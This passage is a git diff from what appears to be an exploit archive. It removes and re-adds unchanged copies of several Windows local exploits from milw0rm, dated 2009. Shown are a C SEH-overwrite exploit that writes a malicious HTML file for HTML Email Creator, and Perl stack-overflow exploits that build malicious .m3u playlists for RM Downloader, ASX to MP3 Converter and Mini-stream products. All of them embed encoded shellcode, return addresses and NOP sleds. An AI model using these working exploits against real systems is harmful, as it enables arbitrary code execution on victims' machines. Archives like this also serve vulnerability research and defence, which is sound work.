-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
-"\x4e\x56\x43\x46\x42\x30\x5a";
-
-
-
-int main() {
-    
-FILE *file;
-int i=0;
-char buf[LEN+1];
-char *ptr=buf;
-
-memset(buf,0x00,LEN+1);
-memset(buf,NOP,LEN);
-*(unsigned long *)&buf[56] = JMP;
-*(unsigned long *)&buf[60] = RET;
-ptr+=56+4+4+40;
-memcpy(ptr, scode, strlen(scode));
-
-file=fopen("pwn.html","w");
-
-fprintf(file, "<HTML>\n<HEAD></HEAD>\n<BODY>\n<img src=\"");
-fputs(buf,file);
-fprintf(file, "\">\n</BODY>\n</HTML>\n");
-fclose(file);
-
-
-printf("File created..\n");
- return 0;   
-}
-
-// milw0rm.com [2009-04-13]
+/*    
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+   [ Discovered and Exploited by dun ]
+
+
+ [ HTML Email Creator <= 2.1 build 668 ] (html) Local SEH Overwrite Exploit
+
+ Vendor:    http://www.html-email.net/
+ Download:  http://www.html-email.net/download/html2emailcreator.exe
+
+ Vuln:
+ <img src="520 x A">
+  or
+ <script src="520 x A">
+  or
+ <link href="520 x A">
+
+  ___________________________520_____________________________ 
+ |                                                           |
+ [ NOPs ][ jmp 11 ][ pop-pop-ret ][ NOPs ][ shellcode ][ NOPs ]
+    56       4           4           40       343         73   
+ 
+  
+ Greetz:  suN8Hclf, str0ke
+ 
+ [ dun'at'strcpy.pl / 2009 ] 
+*/
+
+
+#include <windows.h>
+#include <stdio.h>
+
+/*
+Tested on:      
+WIN XP SP2 with installed "PC TOOLS Spyware Doctor" from google pack
+/SafeSEH OFF     0x636e0000    0x63709000    6.1.0.2    C:\Program Files\Spyware Doctor\smum32.dll
+#define RET   0x636E34BC      // pop-pop-ret
+
+WIN XP without any upgrades
+kernel32.dll  0x77E9CB0E      pop EAX - pop - ret
+#define RET   0x77E9CB0E      // pop-pop-ret
+*/
+
+
+#define RET   0x77E9CB0E      // pop-pop-ret
+#define JMP   0x909011EB      // short jump (jmp 11)
+#define LEN   520
+#define NOP   0x90
+
+
+// win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+char scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
+"\x4e\x56\x43\x46\x42\x30\x5a";
+
+
+
+int main() {
+    
+FILE *file;
+int i=0;
+char buf[LEN+1];
+char *ptr=buf;
+
+memset(buf,0x00,LEN+1);
+memset(buf,NOP,LEN);
+*(unsigned long *)&buf[56] = JMP;
+*(unsigned long *)&buf[60] = RET;
+ptr+=56+4+4+40;
+memcpy(ptr, scode, strlen(scode));
+
+file=fopen("pwn.html","w");
+
+fprintf(file, "<HTML>\n<HEAD></HEAD>\n<BODY>\n<img src=\"");
+fputs(buf,file);
+fprintf(file, "\">\n</BODY>\n</HTML>\n");
+fclose(file);
+
+
+printf("File created..\n");
+ return 0;   
+}
+
+// milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8410.pl b/platforms/windows/local/8410.pl
index c254bb5bc..50fff4b6a 100755
--- a/platforms/windows/local/8410.pl
+++ b/platforms/windows/local/8410.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# RM Downloader Version 3.0.0.9 .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\x17\x48\xF8\x01"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
-      # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20; 
-open(MYFILE,'>>RM-Downloader.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# RM Downloader Version 3.0.0.9 .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x17\x48\xF8\x01"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+      # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20; 
+open(MYFILE,'>>RM-Downloader.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8412.pl b/platforms/windows/local/8412.pl
index 7966639cb..f744b3c07 100755
--- a/platforms/windows/local/8412.pl
+++ b/platforms/windows/local/8412.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# ASX to MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\xBE\x2F\x38\x02";     # Universall Ret Adress and if you want Tes under SP 2 EN/FR use this >>
-      # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20; 
-open(MYFILE,'>>ASX2MP3Converte.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# ASX to MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\xBE\x2F\x38\x02";     # Universall Ret Adress and if you want Tes under SP 2 EN/FR use this >>
+      # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20; 
+open(MYFILE,'>>ASX2MP3Converte.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8413.pl b/platforms/windows/local/8413.pl
index 54c60fd55..046df0a9f 100755
--- a/platforms/windows/local/8413.pl
+++ b/platforms/windows/local/8413.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# Mini-stream RM-MP3 Converter Version 3.0.0.7  .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\x3D\x0C\x04\x02";    # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
-      # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20; 
-open(MYFILE,'>>Mini-stream-RM-MP3.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# Mini-stream RM-MP3 Converter Version 3.0.0.7  .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x3D\x0C\x04\x02";    # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+      # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20; 
+open(MYFILE,'>>Mini-stream-RM-MP3.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8416.pl b/platforms/windows/local/8416.pl
index 0aac5ad76..9f976e5fa 100755
--- a/platforms/windows/local/8416.pl
+++ b/platforms/windows/local/8416.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
-      # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20;
-open(MYFILE,'>>Mini-stream-Ripper.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
